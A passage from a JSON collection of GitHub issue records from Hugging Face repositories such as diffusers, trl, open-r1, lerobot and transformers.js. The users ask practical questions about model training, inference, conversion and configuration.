    "user": "alexblattner"
  },
  {
    "repo": "huggingface/candle",
    "number": 2774,
    "title": "Dumb Question: How to do forward hooks ?",
    "body": "For example I want to extract activations of intermediate layers. How do I register forward hooks similar to PyTorch or is there a similar/comparable paradigm in candle for this ?",
    "url": "https://github.com/huggingface/candle/issues/2774",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-16T12:41:26Z",
    "updated_at": "2025-02-16T12:41:26Z",
    "user": "pzdkn"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10799,
    "title": "Effective region mask for controlnet",
    "body": "Hi, I just want to ask is there any way to use controlnet with mask like [this](https://github.com/Mikubill/sd-webui-controlnet/discussions/2831)\n\nAs you know comfyui, webui support effective region (mask for controlnet affect).\nBut I can't find how to do this with diffusers.",
    "url": "https://github.com/huggingface/diffusers/issues/10799",
    "state": "closed",
    "labels": [
      "stale"
    ],
    "created_at": "2025-02-15T17:42:20Z",
    "updated_at": "2025-04-03T04:01:37Z",
    "comments": 8,
    "user": "Suprhimp"
  },
  {
    "repo": "huggingface/swift-coreml-diffusers",
    "number": 102,
    "title": "Question: how to use in my own swift project for inference?",
    "body": "How would I run diffusers on device on all apple devices in my swift Xcode project?",
    "url": "https://github.com/huggingface/swift-coreml-diffusers/issues/102",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-15T15:56:36Z",
    "updated_at": "2025-02-15T15:56:36Z",
    "user": "SpyC0der77"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1194,
    "title": "How do I know which ONNX transformation models are available? (Errors when loading models with CDN)",
    "body": "### Question\n\nI am using a CDN to load the models, as shown in the code below. \nI filtered the models in HuggingFace the way you recommend (text-generation, transformers.js) and put the id of the model I looked up. As I understand it, to change the model, I only need to change the model id. \nHowever, I get an error for each of the below models.\n\n`Uncaught (in promise) TypeError: Cannot read properties of undefined (reading 'model')`\n\n- **HuggingFaceTB/SmolLM2-135M-Instruct**\n- **Xenova/codegen-350M-mono**\n...\n\n`Uncaught (in promise) Error: Can't create a session. ERROR_CODE: 1, ERROR_MESSAGE: Deserialize tensor model.layers.4.mlp.gate_proj.MatMul.weight_Q4 failed.Failed to load external data file \"\"model_q4f16.onnx_data\"\", error: Module.MountedFiles is not available.`\n\n- **onnx-community/Phi-3.5-mini-instruct-onnx-web**\n...\n\nI'm ultimately saying that I don't know what model will be available.\nAdditionally, I was wondering if there is a way to know 'in advance' which 'dtype' and 'device' can be supported.\n\n```\n  import { pipeline } from 'https://cdn.jsdelivr.net/npm/@huggingface/transformers@3.3.3';\n\n    generator = await pipeline('text-generation', 'onnx-community/DeepSeek-R1-Distill-Qwen-1.5B-ONNX', {\n      dtype: \"auto\",\n      device: \"auto\",\n    });\n```",
    "url": "https://github.com/huggingface/transformers.js/issues/1194",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-02-15T10:31:32Z",
    "updated_at": "2025-02-16T14:02:08Z",
    "user": "mz-imhj"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 333,
    "title": "how to use tensorboard instead of wandb\uff1f",
    "body": "",
    "url": "https://github.com/huggingface/open-r1/issues/333",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-15T08:00:06Z",
    "updated_at": "2025-02-15T08:02:35Z",
    "user": "ngrxmu"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10796,
    "title": "Docs for HunyuanVideo LoRA?",
    "body": "### Describe the bug\n\nAs it seems like LoRA loading on HunyuanVideo has been implemented, I wonder where I can find the docs on this? Are they missing?\n\n### Reproduction\n\nSearch for HunyuanVideo and LoRA\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nAs it is the online docs...\n\n### Who can help?\n\n@stevhliu @sayakpaul ",
    "url": "https://github.com/huggingface/diffusers/issues/10796",
    "state": "closed",
    "labels": [
      "bug",
      "stale"
    ],
    "created_at": "2025-02-15T04:31:34Z",
    "updated_at": "2025-06-10T20:52:28Z",
    "comments": 9,
    "user": "tin2tin"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 328,
    "title": "How to set generation sampling parameters?",
    "body": "Need to use deepseek reference settings of temperature=0.6, top_p=0.95. \n\nGreedy sampling does poorly on AIME:\n\n## r1-1.5B\n- AIME24: 23.33%\n\nTried to refer to lighteval docs and ran into issues using model config:\n```\nmodel: # Model specific parameters\n  base_params:\n    model_args: \"pretrained=Qwen/Qwen2.5-7B-Instruct,dtype=bfloat16,max_model_length=768,gpu_memory_utilisation=0.7\" # Model args that you would pass in the command line\n  generation: # Generation specific parameters\n    temperature: 1.0\n    stop_tokens: null\n    truncate_prompt: false\n```\n\nrun with:\n```\nTASK=aime24 lighteval vllm \\\n    \"config.yaml\" \\\n    \"custom|$TASK|0|0\" \\\n    --custom-tasks tasks.py \\\n    --use-chat-template \\\n    --output-dir ./results/\n```\n\nhitting:\n```\nTypeError: expected str, bytes or os.PathLike object, not dict\n```\n\n[ref](https://github.com/huggingface/lighteval/issues/563)",
    "url": "https://github.com/huggingface/open-r1/issues/328",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-14T21:42:28Z",
    "updated_at": "2025-02-20T03:28:53Z",
    "user": "rawsh"
  },
  {
    "repo": "huggingface/trl",
    "number": 2864,
    "title": "How to train GPRO on 2 GPUs, one for training, one for vllm",
    "body": "### Reproduction\n\nWhen I use `Qwen2.5-3B-instruct` to train GRPO, the device for vllm always appear OOM when loading weights. II used two GPUs with 32GB of memory, one device for training, another for vllm. I dont know why a 3B model using so much memory on `device 1`\n\n![Image](https://github.com/user-attachments/assets/79dfd03c-d123-496d-9fcc-07afc3027dff)\n\narguments settings:\n```yaml\nper_device_train_batch_size: 8\ngradient_accumulation_steps: 8\nnum_generations: 8\nuse_vllm: true\nvllm_gpu_memory_utilization: 0.8\nuse_peft: true\nlora_r: 64\nlora_alpha: 64\nload_in_4bit: true\nuse_bnb_nested_quant: true\nattn_implementation: flash_attention_2\nbf16: true\n...\n```\n\nStart command:\n```shell\nexport CUDA_VISIBLE_DEVICES=0,1\naccelerate launch --num_processes 1 train_Datawhale-R1.py --config Datawhale-R1.yaml\n```\n\n### System Info\n\n- Platform: Linux-5.15.0-78-generic-x86_64-with-glibc2.35\n- Python version: 3.10.8\n- PyTorch version: 2.5.1\n- CUDA device(s): NVIDIA vGPU-32GB, NVIDIA vGPU-32GB\n- Transformers version: 4.48.3\n- Accelerate version: 1.3.0\n- Accelerate config: not found\n- Datasets version: 3.1.0\n- HF Hub version: 0.27.0\n- TRL version: 0.16.0.dev0+ffcb9f4\n- bitsandbytes version: 0.45.2\n- DeepSpeed version: 0.16.3\n- Diffusers version: 0.32.2\n- Liger-Kernel version: not installed\n- LLM-Blender version: not installed\n- OpenAI version: 1.59.7\n- PEFT version: 0.14.0\n\n### Checklist\n\n- [x] I have checked that my issue isn't already filed (see [open issues](https://github.com/huggingface/trl/issues?q=is%3Aissue))\n- [x] I have included my system information\n- [x] Any code provided is minimal, complete, and reproducible ([more on MREs](https://docs.github.com/en/get-started/writing-on-github/working-with-advanced-formatting/creating-and-highlighting-code-blocks))\n- [x] Any code provided is properly formatted in code blocks, (no screenshot, [more on code blocks](https://docs.github.com/en/get-started/writing-on-github/working-with-advanced-formatting/creating-and-highlighting-code-blocks))\n- [x] Any traceback provided is complete",
    "url": "https://github.com/huggingface/trl/issues/2864",
    "state": "open",
    "labels": [
      "\u26a1 PEFT",
      "\u23f3 needs more info",
      "\u26a1accelerate",
      "\ud83c\udfcb GRPO"
    ],
    "created_at": "2025-02-14T15:00:58Z",
    "updated_at": "2025-03-12T12:00:10Z",
    "user": "AIR-hl"
  },
  {
    "repo": "huggingface/peft",
    "number": 2377,
    "title": "Contributing new model merging method to PEFT",
    "body": "### Feature request\n\nHi all,\nI noticed that several model merging methods, such as TIES and DARE, have been implemented in this library, as mentioned [here](https://github.com/huggingface/peft/blob/main/docs/source/developer_guides/model_merging.md).\n\nI was wondering if there is a way for me to contribute a recently accepted model merging method to this repo.\n\nI would really appreciate any guidance or suggestions on how to proceed.\n\nThanks in advance!\n\n\n### Motivation\n\nEnhance the diversity of model merging supported in this library.\n\n### Your contribution\n\nI can submit a PR.",
    "url": "https://github.com/huggingface/peft/issues/2377",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-14T12:17:46Z",
    "updated_at": "2025-03-24T15:04:11Z",
    "comments": 2,
    "user": "SpeeeedLee"
  },
  {
    "repo": "huggingface/optimum",
    "number": 2189,
    "title": "PEFT to ONNX conversion",
    "body": "### System Info\n\n```shell\nHello! \nI have a fine-tuned LLM model from Hugging Face saved in PEFT format, and it\u2019s about 2.1 GB. When we convert it to ONNX, its size nearly doubles to about 4.1 GB. What causes this significant increase in model size after converting from PEFT to ONNX? Is there any bug under this conversion? ( Here is the code do this conversion. Need to mention: loading it in any commented formats will kill the accuracy). Thanks\n\nmodel = ORTModelForCausalLM.from_pretrained(\n            peft_path,\n            provider='OpenVINOExecutionProvider',\n            provider_options={'device_type': 'GPU_FP16'},\n            # use_cache=False,\n            #use_io_binding=False\n            export=True,\n            #load_in_4bit=True,\n            #load_in_8bit=True\n            #torch_dtype=torch.bfloat16,\n            #device_map=device,\n            #from_transformers=True\n        )\ntokenizer = AutoTokenizer.from_pretrained(peft_path)\nmodel.save_pretrained(onnex_path)\ntokenizer.save_pretrained(onnex_path)\n```\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nmodel = ORTModelForCausalLM.from_pretrained(\n            peft_path,\n            provider='OpenVINOExecutionProvider',\n            provider_options={'device_type': 'GPU_FP16'},\n            # use_cache=False,\n            #use_io_binding=False\n            export=True,\n            #load_in_4bit=True,\n            #load_in_8bit=True\n            #torch_dtype=torch.bfloat16,\n            #device_map=device,\n            #from_transformers=True\n        )\ntokenizer = AutoTokenizer.from_pretrained(peft_path)\nmodel.save_pretrained(onnex_path)\ntokenizer.save_pretrained(onnex_path)\n\n### Expected behavior\n\nI need to have the OONX model with at least the same size while not loosing accuracy performance.",
    "url": "https://github.com/huggingface/optimum/issues/2189",
    "state": "open",
    "labels": [
      "bug"
    ],
    "created_at": "2025-02-13T18:21:05Z",
    "updated_at": "2025-03-10T13:58:28Z",
    "comments": 2,
    "user": "morteza89"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 113,
    "title": "Show how to use Inference Providers for inference",
    "body": "Can be helpful for students to explore different models easily.\n",
    "url": "https://github.com/huggingface/agents-course/issues/113",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-13T07:46:01Z",
    "updated_at": "2025-02-13T08:04:58Z",
    "user": "pcuenca"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 718,
    "title": "Hand-Eye Calibration for LeRobot",
    "body": "Hello,\nI am starting a project where I plan to use LeRobot for pick-and-place tasks utilizing classical robotics and vision techniques. I am wondering if anyone has experience with performing hand-eye calibration for this robot.\nMy major concern is that the high-mounted camera is usually parallel to the arm, which may make it difficult for the camera to see the Aruco marker. Does anyone have any suggestions or insights on how to approach this?\nThank you!",
    "url": "https://github.com/huggingface/lerobot/issues/718",
    "state": "closed",
    "labels": [
      "question",
      "stale"
    ],
    "created_at": "2025-02-12T05:44:09Z",
    "updated_at": "2025-12-21T02:59:43Z",
    "user": "Akumar201"
  },
  {
    "repo": "huggingface/optimum-neuron",
    "number": 782,
    "title": "Docs on how to compile a pre-trained transformer",
    "body": "Hello,\n\nI am experimenting with Transformers and trying to run them on AWS Inferentia.\n\nI checked the official [docs](https://huggingface.co/docs/optimum-neuron/index) but I could not find a clear answer to my current problem.\n\nI currently have a customized model based on the [ALBERT transformer](https://huggingface.co/docs/transformers/en/model_doc/albert) that I fine-tuned and for which I exported the weights.\n\n```python\nfrom transformers import AlbertConfig, AlbertModel\nimport torch\n\nconfig_dict= {\n    \"vocab_size\": 178,\n    \"hidden_size\": 768,\n    \"num_attention_heads\": 12,\n    \"intermediate_size\": 2048,\n    \"max_position_embeddings\": 512,\n    \"num_hidden_layers\": 12,\n    \"dropout\": 0.1,\n}\n\nalbert_config = AlbertConfig(**config_dict)\nmodel = AlbertModel(albert_config)\n\nweights = torch.load(\"path/to/weights.pt\")\nmodel.load_state_dict(weights)\n```\n\nMy question is, how do I go from the model above to compiling it for AWS Inferentia using the `optimum-neuron` python library programmatically? I could not find documented examples or snippets for this use-case.",
    "url": "https://github.com/huggingface/optimum-neuron/issues/782",
    "state": "closed",
    "labels": [
      "Stale"
    ],
    "created_at": "2025-02-11T23:36:13Z",
    "updated_at": "2025-03-20T08:05:40Z",
    "user": "efemaer"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10772,
    "title": "Sana Controlnet Support",
    "body": "**Is your feature request related to a problem? Please describe.**\nThe first controlnet for Sana has appeared, so the feature is to add the sana controlnet to the diffusers pipeline https://github.com/NVlabs/Sana/blob/main/asset/docs/sana_controlnet.md\n\n**Describe the solution you'd like.**\nBe able to use the sana controlnet\n\n**Describe alternatives you've considered.**\nUsing the sana repo\n\n",
    "url": "https://github.com/huggingface/diffusers/issues/10772",
    "state": "closed",
    "labels": [
      "help wanted",
      "Good second issue",
      "contributions-welcome",
      "roadmap"
    ],
    "created_at": "2025-02-11T22:39:10Z",
    "updated_at": "2025-04-13T13:49:40Z",
    "comments": 5,
    "user": "jloveric"
  },
  {
    "repo": "huggingface/smolagents",
    "number": 610,
    "title": "Is this normal? Im getting this a lot",
    "body": "Hey, is this normal? \n\n![Image](https://github.com/user-attachments/assets/8da7d739-10c4-4bd3-bc1d-78db00c707bd)\n\nalso, out: None is this ok as well??",
    "url": "https://github.com/huggingface/smolagents/issues/610",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-02-11T22:05:27Z",
    "updated_at": "2025-03-19T07:12:32Z",
    "user": "Mhdaw"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 77,
    "title": "[QUESTION] Why am I able to select multiple options in Quick Quiz?",
    "body": "In quick quizzes as there is a single answer correct, shouldn't it be like only be able to choose a single option instead of being able select all at once to see correct answer?\n",
    "url": "https://github.com/huggingface/agents-course/issues/77",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-02-11T17:35:31Z",
    "updated_at": "2025-02-13T07:20:59Z",
    "user": "Devrajsinh-Gohil"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 66,
    "title": "[QUESTION] About the **Thought: Internal Reasoning and the Re-Act Approach** section of UNIT 1",
    "body": "I am a bit confused about the ReAct prompting example at the end of the **Thought: Internal Reasoning and the Re-Act Approach** section in Unit 1. The figure label describes it as an example of **ReAct**, but the image itself mentions \"Zero-shot CoT.\" Could you please take a look at this section and clarify? I would really appreciate your help!",
    "url": "https://github.com/huggingface/agents-course/issues/66",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-02-11T03:54:26Z",
    "updated_at": "2025-02-13T07:30:13Z",
    "user": "saidul-islam98"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7390,
    "title": "Re-add py.typed",
    "body": "### Feature request\n\nThe motivation for removing py.typed no longer seems to apply.  Would a solution like [this one](https://github.com/huggingface/huggingface_hub/pull/2752) work here?\n\n### Motivation\n\nMyPy support is broken.  As more type checkers come out, such as RedKnot, these may also be broken.  It would be good to be PEP 561 compliant as long as it's not too onerous.\n\n### Your contribution\n\nI can re-add py.typed, but I don't know how to make sur all of the `__all__` files are provided (although you may not need to with modern PyRight).",
    "url": "https://github.com/huggingface/datasets/issues/7390",
    "state": "open",
    "labels": [
      "enhancement"
    ],
    "created_at": "2025-02-10T22:12:52Z",
    "updated_at": "2025-08-10T00:51:17Z",
    "comments": 1,
    "user": "NeilGirdhar"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 707,
    "title": "is there option to run on parallel gpu",
    "body": "I have 2 gpus 4090 I wonder if there is an option to run on parallel while finetuning the model\n\nI have found this parameter here \n\n![Image](https://github.com/user-attachments/assets/d88768fe-0c93-40cd-9301-30bfd60315a9)\n\nbut I don't actually understand what do you mean by mp\n\nso if there is option for parallel gpu please tell us about it",
    "url": "https://github.com/huggingface/lerobot/issues/707",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-02-10T09:34:13Z",
    "updated_at": "2025-05-14T20:51:43Z",
    "user": "AbdElrahmanMostafaRifaat1432"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 706,
    "title": "adapt_to_pi_aloha parameter",
    "body": "I am finetuning pi0 on a static aloha dataset and I found the following parameter : adapt_to_pi_aloha : false \nin /lerobot/common/policies/pi0/configuration_pi0.py \n\nbut when I set it to true the first loss increased from 0.17 to 4.7\n\nshould I set it to true or not knowing that I want the predicted actions to be in aloha space\n\n",
    "url": "https://github.com/huggingface/lerobot/issues/706",
    "state": "open",
    "labels": [
      "question",
      "configuration"
    ],
    "created_at": "2025-02-10T09:24:45Z",
    "updated_at": "2025-07-24T08:15:35Z",
    "user": "AbdElrahmanMostafaRifaat1432"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1708,
    "title": "Generation failed occur",
    "body": "when I ask model then get generation error \n\n![Image](https://github.com/user-attachments/assets/9cccfa87-09d6-48fb-b693-67b6ecffabd4)\n\nusing base model is llama3 -1b\n\nbelow code is my .env.local code \n\n![Image](https://github.com/user-attachments/assets/5cd50727-be1f-4081-ac80-e24fdb3e20dd)",
    "url": "https://github.com/huggingface/chat-ui/issues/1708",
    "state": "open",
    "labels": [
      "support"
    ],
    "created_at": "2025-02-10T08:12:56Z",
    "updated_at": "2025-02-12T07:48:47Z",
    "comments": 5,
    "user": "mondayjowa"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 260,
    "title": "How to use tensor_parallel_size for vllm in GRPO?",
    "body": "GRPO use vllm to load reference model for data sampling , The limitation is that tensor parallel are not supported.\nWhat if the reference model is larger than One GPU can hold, for example, 72B with 40GB's H800,\n\nIs there any setting we can set the tensor_parallel_size for vllm params?\n\n```\n        if self.accelerator.is_main_process:\n                vllm_device = self.args.vllm_device\n                if vllm_device == \"auto\":\n                    vllm_device = f\"cuda:{self.accelerator.num_processes}\"  # take the next GPU idx\n                # Check that the requested device is available\n                if vllm_device.split(\":\")[0] == \"cuda\" and int(vllm_device.split(\":\")[1]) >= torch.cuda.device_count():\n                    raise ValueError(\n                        f\"The requested device for vllm ({vllm_device}) is not available. You are likely using vLLM \"\n                        \"without restricting the number of GPUs for training. Set the `--num_processes` argument to a \"\n                        \"value lower than the number of GPUs available on your machine\u2014typically, reducing it by one \"\n                        f\"is sufficient. In your case: `--num_processes {torch.cuda.device_count() - 1}`.\"\n                    )\n                # Check that the requested device is not also used for training\n                if vllm_device in {f\"cuda:{idx}\" for idx in range(self.accelerator.num_processes)}:\n                    warnings.warn(\n                        f\"The requested device {vllm_device} is also used for training. This may lead to unexpected \"\n                        \"behavior. It is recommended to use a dedicated device for vLLM.\"\n                    )\n                # vLLM is not compatible with accelerate. So we need to patch it to make sure we can (1) place the vLLM\n                # model on the desired device (world_size_patch) and (2) avoid a test that is not designed for our\n                # setting (profiling_patch).\n                world_size_patch = patch(\"torch.distributed.get_world_size\", return_value=1)\n                profiling_patch = patch(\n                    \"vllm.worker.worker.Worker._assert_memory_footprint_increased_during_profiling\", return_value=None\n                )\n                with world_size_patch, profiling_patch:\n                    self.llm = LLM(\n                        model=model.name_or_path,\n                        device=vllm_device,\n                        gpu_memory_utilization=self.args.vllm_gpu_memory_utilization,\n                        dtype=self.args.vllm_dtype,\n                        # Automatic Prefix Caching caches the KV cache of existing queries, so that a new query can\n                        # directly reuse the KV cache if it shares the same prefix with one of the existing queries.\n                        # This is particularly useful here because we generate completions from the same prompts.\n                        enable_prefix_caching=True,\n                        max_model_len=self.args.vllm_max_model_len,\n                    )\n                self.sampling_params = SamplingParams(\n                    temperature=args.temperature,\n                    max_tokens=self.max_completion_length,\n                )\n\n```",
    "url": "https://github.com/huggingface/open-r1/issues/260",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-10T07:17:07Z",
    "updated_at": "2025-02-20T12:21:15Z",
    "user": "bannima"
  },
  {
    "repo": "huggingface/trl",
    "number": 2814,
    "title": "How to use tensor_parallel_size for vllm reference in GRPO?",
    "body": "GRPO use vllm to load reference model for data sampling , The limitation is that tensor parallel are not supported.\nWhat if the reference model is larger than One GPU can hold, for example, 72B with 40GB's H800, \n\nIs there any setting we can set the tensor_parallel_size for vllm params?\n\n```\n        if self.accelerator.is_main_process:\n                vllm_device = self.args.vllm_device\n                if vllm_device == \"auto\":\n                    vllm_device = f\"cuda:{self.accelerator.num_processes}\"  # take the next GPU idx\n                # Check that the requested device is available\n                if vllm_device.split(\":\")[0] == \"cuda\" and int(vllm_device.split(\":\")[1]) >= torch.cuda.device_count():\n                    raise ValueError(\n                        f\"The requested device for vllm ({vllm_device}) is not available. You are likely using vLLM \"\n                        \"without restricting the number of GPUs for training. Set the `--num_processes` argument to a \"\n                        \"value lower than the number of GPUs available on your machine\u2014typically, reducing it by one \"\n                        f\"is sufficient. In your case: `--num_processes {torch.cuda.device_count() - 1}`.\"\n                    )\n                # Check that the requested device is not also used for training\n                if vllm_device in {f\"cuda:{idx}\" for idx in range(self.accelerator.num_processes)}:\n                    warnings.warn(\n                        f\"The requested device {vllm_device} is also used for training. This may lead to unexpected \"\n                        \"behavior. It is recommended to use a dedicated device for vLLM.\"\n                    )\n                # vLLM is not compatible with accelerate. So we need to patch it to make sure we can (1) place the vLLM\n                # model on the desired device (world_size_patch) and (2) avoid a test that is not designed for our\n                # setting (profiling_patch).\n                world_size_patch = patch(\"torch.distributed.get_world_size\", return_value=1)\n                profiling_patch = patch(\n                    \"vllm.worker.worker.Worker._assert_memory_footprint_increased_during_profiling\", return_value=None\n                )\n                with world_size_patch, profiling_patch:\n                    self.llm = LLM(\n                        model=model.name_or_path,\n                        device=vllm_device,\n                        gpu_memory_utilization=self.args.vllm_gpu_memory_utilization,\n                        dtype=self.args.vllm_dtype,\n                        # Automatic Prefix Caching caches the KV cache of existing queries, so that a new query can\n                        # directly reuse the KV cache if it shares the same prefix with one of the existing queries.\n                        # This is particularly useful here because we generate completions from the same prompts.\n                        enable_prefix_caching=True,\n                        max_model_len=self.args.vllm_max_model_len,\n                    )\n                self.sampling_params = SamplingParams(\n                    temperature=args.temperature,\n                    max_tokens=self.max_completion_length,\n                )```",
    "url": "https://github.com/huggingface/trl/issues/2814",
    "state": "open",
    "labels": [
      "\u26a1accelerate",
      "\ud83c\udfcb GRPO"
    ],
    "created_at": "2025-02-10T07:09:47Z",
    "updated_at": "2025-03-04T11:40:13Z",
    "user": "bannima"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10755,
    "title": "Difference in Output When Using PIL.Image vs numpy.array for Image and Mask Input.",
    "body": "hi. \nI get different results when providing image and mask as input using PIL.Image versus numpy. array. Why does this happen?\nIs there an issue with my normalization method?\n\n| pillow | array |\n|---|---|\n| ![Image](https://github.com/user-attachments/assets/8e8a3af8-00cd-4675-93ce-b1c05eec4eb5) | ![Image](https://github.com/user-attachments/assets/25253b2a-9758-4a0f-8925-42e7a1558e50) |\n\n#### pillow code\n```python\nimage = Image.open(image_path).convert(\"RGB\")\nmask = Image.open(mask_path).convert(\"L\")\n\noutput_image = pipeline(\n    image=image,\n    mask_image=mask,\n    generator=torch.Generator(device=self.device).manual_seed(0),\n).images[0]\n\n```\n#### array code\n```python\nimage = Image.open(image_path).convert(\"RGB\")\nmask = Image.open(mask_path).convert(\"L\")\nimage_array = np.array(image) / 255.0\nmask_array = np.array(mask) / 255.0\n\noutput_image = pipeline(\n    image=image_array,\n    mask_image=mask_array,\n    generator=torch.Generator(device=self.device).manual_seed(0),\n).images[0]\n```\n",
    "url": "https://github.com/huggingface/diffusers/issues/10755",
    "state": "open",
    "labels": [
      "stale"
    ],
    "created_at": "2025-02-10T05:24:27Z",
    "updated_at": "2025-03-12T15:03:12Z",
    "comments": 2,
    "user": "purple-k"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7387,
    "title": "Dynamic adjusting dataloader sampling weight",
    "body": "Hi,\nThanks for your wonderful work! I'm wondering is there a way to dynamically adjust the sampling weight of each data in the dataset during training? Looking forward to your reply, thanks again.",
    "url": "https://github.com/huggingface/datasets/issues/7387",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-10T03:18:47Z",
    "updated_at": "2025-03-07T14:06:54Z",
    "comments": 3,
    "user": "whc688"
  },
  {
    "repo": "huggingface/trl",
    "number": 2813,
    "title": "What is the minimum GPU requirement in gigabytes for TRL intensive training?",
    "body": "",
    "url": "https://github.com/huggingface/trl/issues/2813",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-10T02:52:07Z",
    "updated_at": "2025-02-11T08:41:56Z",
    "user": "lonngxiang"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1188,
    "title": "It seems like Xenova/swin2SR-classical-sr-x2-64 model only work with image url?How to implement partial output with it?",
    "body": "### Question\n\nI have fun with react demo and Xenova/swin2SR-classical-sr-x2-64 model.\nhttps://huggingface.co/Xenova/swin2SR-classical-sr-x2-64\nI tried to give object URL to upscaler function but it doesn't work, I wonder if it only accepts image url.\nAlso I want to know how to do partial output like the translate react demo.\n\nI tried to convert output data to base64 for rendering but It doesn't work.\n\n![Image](https://github.com/user-attachments/assets/928eaf32-dd80-469f-9bd2-6dd88c876e74)\n![Image](https://github.com/user-attachments/assets/f63fd713-0738-4fd6-86ff-657963dba2bc)\n\nIs it output png rawdata only?",
    "url": "https://github.com/huggingface/transformers.js/issues/1188",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-02-10T02:18:32Z",
    "updated_at": "2025-02-16T00:50:36Z",
    "user": "codenoobforreal"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1186,
    "title": "Which undocumented transformersJS Generator parameters are supported? crapCheck ran fine.",
    "body": "### Question\n\nSorry to bug you again Josh   @xenova    I was trying a set of generator parameters and things were working fine without errors so I tried the parameter \"crapCheck\" and it also ran without errors so now I am worried if anything works. In the docs it seems that these are supported:  \n\nSupported Parameters (Confirmed in Docs)\n\nmax_new_tokens: \u2705 Yes (Controls the number of new tokens to generate)\n\ndo_sample: \u2705 Yes (Enables sampling)\n\ntop_p: \u2705 Yes (Nucleus sampling)\n\ntemperature: \u2705 Yes (Controls randomness)\n\ntop_k: \u2705 Yes (Top-k filtering)\n\nnum_return_sequences: \u2705 Yes (Number of sequences to return)\n\n\n  Demo code [here](https://hpssjellis.github.io/my-examples-of-transformersJS/public/deepseek-r1-webgpu/deepseek-r1-webgpu-00.html) but without all the below parameters, just some of them.\n\nAny suggestions on what may work and what to ignore?\n\n```\n\n    const output = await generator(messages, {\n\n\n      max_new_tokens: myMaxT,          // 512\n      do_sample: myDo_sample,          // true\n      top_p: myTop_p,                          // 0.9  \n      temperature: myTemperature,    // 0.7\n      top_k: myTop_k,                          // testing if it does top_k  50\n      num_return_sequences: 1,          // 1\n      streamer,                                     // calls the function TextStreamer\n\n      min_length: myMin_length,                          // Ensures at least 20 tokens are generated\n      repetition_penalty: myRepetition_penalty,   // 1.2\n      length_penalty: myLength_penalty,             // 1.5\n\n      early_stopping: myEarly_stopping,               // end testing  true false\n      chain_of_thought: myChain_of_thought,      // true\n      stopping_criteria: stoppingCriteria,              // Use stopping criteria for clean stopping\n\n      crapCheck: 65,                                             // fairly sure this is not supported\n\n    });\n```",
    "url": "https://github.com/huggingface/transformers.js/issues/1186",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-02-09T05:35:57Z",
    "updated_at": "2025-02-09T05:35:57Z",
    "user": "hpssjellis"
  },
  {
    "repo": "huggingface/lighteval",
    "number": 545,
    "title": "couldn't find it in the cached files and it looks like Elron/bleurt-tiny-512, how to set the model path?",
    "body": "How to set the eval model path?\n## Eval\nwhen I use the script to eval model  with MATH-500\n\n`NUM_GPUS=8 # Set to 8 for 32B and 70B models\nMODEL=Deepseek_R1_distill/Qwen2.5-32B-Open-R1-Distill/\nMODEL_ARGS=\"pretrained=$MODEL,dtype=bfloat16,max_model_length=32768,gpu_memory_utilisation=0.8,tensor_parallel_size=$NUM_GPUS\"\nOUTPUT_DIR=data/evals/Qwen2.5-32B-Open-R1-Distill\n\nlighteval vllm $MODEL_ARGS \"custom|math_500|0|0\" \\\n    --custom-tasks src/open_r1/evaluate.py \\\n    --use-chat-template \\\n    --output-dir $OUTPUT_DIR\n`\n\n\n##  Error\nError: We couldn't connect to 'https://huggingface.co' to load this file, couldn't find it in the cached files and it looks like Elron/bleurt-tiny-512 is not the path to a directory containing a file named \nconfig.json.\n\nWhere to set the eval model path in the script?",
    "url": "https://github.com/huggingface/lighteval/issues/545",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-08T07:26:28Z",
    "updated_at": "2025-05-15T15:27:30Z",
    "user": "bannima"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 240,
    "title": "How to do knowledge distillation training",
    "body": "In the deepseek r1 technical report, there is a small model based on distillation at the end; deepseek r1, as the teacher model,  qwen and llama, as the student model, do SFT based on distilled data. However, it seems that the process of knowledge distillation is not involved here(open r1), that is, the process of the r1 teacher model modifying the output of the student model, but simply SFT based on distilled data.",
    "url": "https://github.com/huggingface/open-r1/issues/240",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-08T06:50:20Z",
    "updated_at": "2025-02-27T08:16:02Z",
    "user": "RyanOvO"
  },
  {
    "repo": "huggingface/transformers.js-examples",
    "number": 42,
    "title": "How to stop the transformerJS webGPU models when they chat for too long.",
